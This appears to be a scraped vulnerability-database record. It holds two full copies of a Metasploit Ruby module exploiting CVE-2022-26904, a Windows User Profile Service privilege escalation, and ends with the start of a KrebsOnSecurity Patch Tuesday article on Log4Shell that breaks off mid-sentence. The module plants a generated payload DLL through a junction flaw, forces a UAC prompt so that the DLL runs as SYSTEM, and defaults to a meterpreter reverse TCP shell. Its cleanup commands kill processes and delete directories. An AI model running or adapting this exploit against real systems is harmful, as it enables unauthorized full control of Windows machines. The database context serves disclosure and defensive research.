'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n version = get_version_info\n unless version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Win10_21H2) ||\n version.build_number == Msf::WindowsVersion::Win11_21H2 ||\n version.build_number == Msf::WindowsVersion::Server2022\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n # Build numbers taken from https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904, and associated\n # security update information (e.g. https://support.microsoft.com/en-us/topic/windows-10-update-history-857b8ccb-71e4-49e5-b3f6-7073197d98fb,\n # https://support.microsoft.com/en-us/topic/windows-11-version-21h2-update-history-a19cd327-b57f-44b9-84e0-26ced7109ba9)\n if version.build_number == Msf::WindowsVersion::Win11_21H2 && version.build_number.revision_number.between?(0, 612)\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Server2022 && version.build_number.revision_number.between?(0, 642)\n return CheckCode::Appears('Vulnerable Windows Server 2022 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_21H2 && version.build_number.revision_number.between?(0, 1644)\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_21H1 && version.build_number.revision_number.between?(0, 1644)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_20H2 && version.build_number.revision_number.between?(0, 1644)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1909 && version.build_number.revision_number.between?(0, 2211)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1809 && version.build_number.revision_number.between?(0, 2802)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1607 && version.build_number.revision_number.between?(0, 5065)\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win10_1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win81 # Includes Server 2012 R2\n target_not_presently_supported\n return CheckCode::Detected('Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif version.build_number == Msf::WindowsVersion::Win8 # Includes Server 2012\n target_not_presently_supported\n return CheckCode::Detected('Windows 8/Windows Server 2012 build detected!')\n elsif version.build_number.between?(Msf::WindowsVersion::Win7_SP0, Msf::WindowsVersion::Win7_SP1) # Includes Server 2008 R2\n target_not_presently_supported\n return CheckCode::Detected('Windows 7/Windows Server 2008 R2 build detected!')\n elsif version.build_number.between?(Msf::WindowsVersion::Server2008_SP0, Msf::WindowsVersion::Server2008_SP2_Update) # Includes Server 2008\n target_not_presently_supported\n return CheckCode::Detected('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif get_version_info.build_number < Msf::WindowsVersion::Win10_InitialRelease\n fail_with(Failure::NoTarget, 'Target is running Windows, but not a version this module supports! Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_26904_superprofile.rb", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-06-14T15:38:05", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T00:00:00", "type": "zdt", "title": "Windows User Profile Service Privlege Escalation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-04-12T00:00:00", "id": "1337DAY-ID-37625", "href": "https://0day.today/exploit/description/37625", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'WfsDelay' => 300\n },\n 'AKA' => [ 'SuperProfile' ]\n }\n )\n )\n\n register_options([\n OptString.new('LOGINUSER', [true, 'Username of the secondary normal privileged user to log in as. Cannot be the same as the current user!']),\n OptString.new('LOGINDOMAIN', [true, 'Domain that the LOGINUSER belongs to. Ensures we log into the right domain.', '.']),\n OptString.new('LOGINPASSWORD', [true, 'Password for the secondary normal privileged user to log in as'])\n ])\n end\n\n def check\n sysinfo_value = sysinfo['OS']\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')\n end\n\n # see https://docs.microsoft.com/en-us/windows/release-information/\n unless sysinfo_value =~ /(7|8|8\\.1|10|11|2008|2012|2016|2019|2022|1803|1903|1909|2004)/\n return CheckCode::Safe('Target is not running a vulnerable version of Windows!')\n end\n\n print_status('Checking if PromptOnSecureDesktop mitigation applied...')\n reg_key = 'HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'\n reg_val = 'PromptOnSecureDesktop'\n begin\n root_key, base_key = @session.sys.registry.splitkey(reg_key)\n value = @session.sys.registry.query_value_direct(root_key, base_key, reg_val)\n rescue Rex::Post::Meterpreter::RequestError => e\n return CheckCode::Unknown(\"Was not able to retrieve the PromptOnSecureDesktop value. Error was #{e}\")\n end\n\n if value.data == 0\n return CheckCode::Safe('PromptOnSecureDesktop is set to 0, mitigation applied!')\n elsif value.data == 1\n print_good('PromptOnSecureDesktop is set to 1, should be safe to proceed!')\n else\n return CheckCode::Unknown(\"PromptOnSecureDesktop was not set to a known value, are you sure the target system isn't corrupted?\")\n end\n\n _major, _minor, build, revision, _branch = file_version('C:\\\\Windows\\\\System32\\\\ntdll.dll')\n major_minor_version = sysinfo_value.match(/\\((\\d{1,2}\\.\\d)/)\n if major_minor_version.nil?\n return CheckCode::Unknown(\"Could not retrieve the major n minor version of the target's build number!\")\n end\n\n major_minor_version = major_minor_version[1]\n build_num = \"#{major_minor_version}.#{build}.#{revision}\"\n\n build_num_gemversion = Rex::Version.new(build_num)\n\n # Build numbers taken from https://www.gaijin.at/en/infos/windows-version-numbers and from\n # https://en.wikipedia.org/wiki/Windows_11_version_history and https://en.wikipedia.org/wiki/Windows_10_version_history\n if (build_num_gemversion >= Rex::Version.new('10.0.22000.0')) # Windows 11\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.20348.0')) # Windows Server 2022\n return CheckCode::Appears('Vulnerable Windows 11 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19044.0')) # Windows 10 21H2\n return CheckCode::Appears('Vulnerable Windows 10 21H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19043.0')) # Windows 10 21H1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 21H1 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19042.0')) # Windows 10 20H2 / Windows Server, Version 20H2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 20H2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.19041.0')) # Windows 10 v2004 / Windows Server v2004\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v2004 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18363.0')) # Windows 10 v1909 / Windows Server v1909\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.18362.0')) # Windows 10 v1903\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17763.0')) # Windows 10 v1809 / Windows Server 2019 v1809\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.17134.0')) # Windows 10 v1803\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.16299.0')) # Windows 10 v1709\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.15063.0')) # Windows 10 v1703\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.14393.0')) # Windows 10 v1607 / Windows Server 2016 v1607\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10586.0')) # Windows 10 v1511\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('10.0.10240.0')) # Windows 10 v1507\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.3.9600.0')) # Windows 8.1/Windows Server 2012 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.2.9200.0')) # Windows 8/Windows Server 2012\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 8/Windows Server 2012 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7601.0')) # Windows 7 SP1/Windows Server 2008 R2 SP1\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.1.7600.0')) # Windows 7/Windows Server 2008 R2\n target_not_presently_supported\n return CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!')\n elsif (build_num_gemversion >= Rex::Version.new('6.0.6002.0')) # Windows Server 2008 SP2\n target_not_presently_supported\n return CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!')\n else\n return CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!')\n end\n end\n\n def target_not_presently_supported\n print_warning('This target is not presently supported by this exploit. Support may be added in the future!')\n print_warning('Attempts to exploit this target with this module WILL NOT WORK!')\n end\n\n def check_target_is_running_supported_windows_version\n if !sysinfo['OS'].include?('Windows')\n fail_with(Failure::NotVulnerable, 'Target is not running Windows!')\n elsif !sysinfo['OS'].include?('Windows 10') && !sysinfo['OS'].include?('Windows 11') && !sysinfo['OS'].include?('Windows Server 2022')\n fail_with(Failure::NoTarget, 'Target is running Windows, its not a version this module supports! Bailing...')\n end\n end\n\n def exploit\n # Step 1: Check target environment is correct.\n print_status('Step #1: Checking target environment...')\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n check_target_is_running_supported_windows_version\n\n # Step 2: Generate the malicious DLL and upload it to a temp location.\n payload_dll = generate_payload_dll\n print_status(\"Payload DLL is #{payload_dll.length} bytes long\")\n temp_directory = session.sys.config.getenv('%TEMP%')\n malicious_dll_location = \"#{temp_directory}\\\\#{Rex::Text.rand_text_alpha(6..13)}.dll\"\n print_status(\"Writing malicious DLL to #{malicious_dll_location}\")\n write_file(malicious_dll_location, payload_dll)\n\n print_status('Marking DLL as full access for Everyone so that there are no access issues as the secondary user...')\n cmd_exec(\"icacls #{malicious_dll_location} /grant Everyone:(F)\")\n register_file_for_cleanup(malicious_dll_location)\n\n # Register the directories we create for cleanup\n register_dir_for_cleanup('C:\\\\Windows\\\\System32\\\\Narrator.exe.Local')\n register_dir_for_cleanup('C:\\\\Users\\\\TEMP')\n\n # Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy.\n print_status('Step #3: Loading the exploit DLL to run the main exploit...')\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-26904', 'CVE-2022-26904.dll')\n library_path = ::File.expand_path(library_path)\n\n dll_info_parameter = datastore['LOGINUSER'].to_s + '||' + datastore['LOGINDOMAIN'].to_s + '||' + datastore['LOGINPASSWORD'].to_s + '||' + malicious_dll_location.to_s\n\n @session_obtained_bool = false\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation, and the credentials for the second user.\n execute_dll(library_path, dll_info_parameter)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n print_warning(\"Cleanup may not occur automatically if you aren't using a Meterpreter payload so make sure to run the following command upon session completion:\")\n print_warning('taskkill /IM \"consent.exe\" /F || taskkill /IM \"narrator.exe\" /F || taskkill /IM \"narratorquickstart.exe\" /F || taskkill /IM \"msiexec.exe\" || rmdir /q /s C:\\Users\\TEMP || rmdir /q /s C:\\Windows\\System32\\Narrator.exe.local')\n print_warning('You may need to run this more than once to ensure these files are properly deleted and Narrator.exe actually closes!')\n\n print_status('Sleeping for 60 seconds before trying to spawn UserAccountControlSettings.exe as a backup.')\n print_status('If you get a shell back before this, feel free to CTRL+C once the shell has successfully returned.')\n sleep(60)\n if (@session_obtained_bool == false)\n # Execute a command that requires elevation to cause the UAC prompt to appear. For some reason the DLL code itself\n # triggering the UAC prompt won't work at times so this is the best way of solving this issue for cases where this happens.\n begin\n cmd_exec('UserAccountControlSettings.exe')\n rescue Rex::TimeoutError\n print_warning('Will need to get user to click on the flashing icon in the taskbar to open the UAC prompt and give us shells!')\n end\n end\n end\n\n def on_new_session(new_session)\n @session_obtained_bool = true\n old_session = @session\n @session = new_session\n if new_session.type == 'meterpreter'\n consent_pids = pidof('consent.exe')\n for id in consent_pids\n @session.sys.process.kill(id)\n end\n sleep(5) # Needed as otherwise later folder deletion calls sometimes fail, and additional Narrator.exe processes\n # can sometimes spawn a few seconds after we close consent.exe so we want to grab all of them at once.\n narrator_pids = pidof('Narrator.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('NarratorQuickStart.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n narrator_pids = pidof('msiexec.exe')\n for id in narrator_pids\n @session.sys.process.kill(id)\n end\n else\n # If it is another session type such as shell or PowerShell we will need to execute the command\n # normally using cmd_exec() to cleanup, as it doesn't seem we have a built in option to kill processes\n # by name or PIDs as library functions for these session types.\n cmd_exec('taskkill /IM \"consent.exe\" /F')\n sleep(5)\n cmd_exec('taskkill /IM \"narrator.exe\" /F')\n cmd_exec('taskkill /IM \"narratorquickstart.exe\" /F')\n cmd_exec('taskkill /IM \"msiexec.exe\" /F')\n end\n\n rm_rf('C:\\\\Windows\\\\System32\\\\Narrator.exe.local')\n for _i in range(1..3)\n rm_rf('C:\\\\Users\\\\TEMP') # Try deleting this 3 times just to be sure.\n end\n @session = old_session\n super\n end\nend\n", "sourceHref": "https://0day.today/exploit/37625", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-12-23T19:27:26", "description": "**Microsoft**, **Adobe**, and **Google** all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month's Patch Tuesday is overshadowed by the "**Log4Shell**" 0-day exploit in a popular **Java** library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/07/windupate.png)\n\nLog4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called "**log4j**," which is included in a huge number of Java applications. Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.\n\nAccording to researchers at **Lunasec**, many, many services are vulnerable to this exploit.\n\n"Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable," Lunasec [wrote](<https://www.lunasec.io/docs/blog/log4j-zero-day/>). "Anybody using Apache Struts is likely vulnerable. We've seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. An extensive list of responses from impacted organizations has been compiled [here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>)."\n\n"If you run a server built on open-source software, there\u2019s a good chance you are impacted by this vulnerability," said **Dustin Childs** of Trend Micro's Zero Day Initiative. "Check with all the vendors in your enterprise to see if they are impacted and what patches are available."\n\nPart of the difficulty in patching against the Log4Shell attack is identifying all of the vulnerable web applications, said **Johannes Ullrich**, an incident handler and blogger for the **SANS Internet Storm Center**. "Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon," Ullrich said. "Treat it as such." SANS has [a good walk-through](<https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/>) of how simple yet powerful the exploit can be.\n\n**John Hultquist**, vice president of intelligence analysis at **Mandiant**, said the company has seen Chinese and Iranian state actors leveraging the log4j vulnerability, and that the Iranian actors are particularly aggressive, having taken part in ransomware operations that may be primarily carried out for disruptive purposes rather than financial gain.\n\n"We anticipate other state actors are doing so as well, or preparing to," Hultquist said. "We believe these actors will work quickly to create footholds in desirable networks for follow-on activity, which may last for some time. In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting."\n\nResearcher **Kevin Beaumont** had a more lighthearted take on Log4Shell [via Twitter](<https://twitter.com/GossiTheDog/status/1470787395805192199>):\n\n"Basically the perfect ending to cybersecurity in 2021 is a 90s style Java vulnerability in an open source module, written by two volunteers with no funding, used by large cybersecurity vendors, undetected until Minecraft chat got pwned, where nobody knows how to respond properly."\n\nThe** Cybersecurity and Infrastructure Security Agency** (CISA) has joined with the **FBI**, **National Security Agency** (NSA) and partners abroad in publishing [an advisory](<https://www.cisa.gov/uscert/ncas/alerts/aa21-356a>) to help organizations mitigate Log4Shell and other Log4j-related vulnerabilities.\n\nA half-dozen of the vulnerabilities addressed by Microsoft today earned its most dire "critical" rating, meaning malware or miscreants could exploit the flaws to gain complete, remote control over a vulnerable Windows system with little or no help from users.\n\nThe Windows flaw already seeing active exploitation is [CVE-2021-43890](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-43890>), which is a "spoofing" bug in the **Windows AppX installer** on **Windows 10.** Microsoft says it is aware of attempts to exploit this flaw using specially crafted packages to implant malware families like [Emotet](<https://krebsonsecurity.com/?s=Emotet>), [Trickbot](<https://krebsonsecurity.com/?s=trickbot>), and [BazaLoader](<https://www.proofpoint.com/us/blog/threat-insight/bazaflix-bazaloader-fakes-movie-streaming-service>).\n\n**Kevin Breen**, director of threat research for 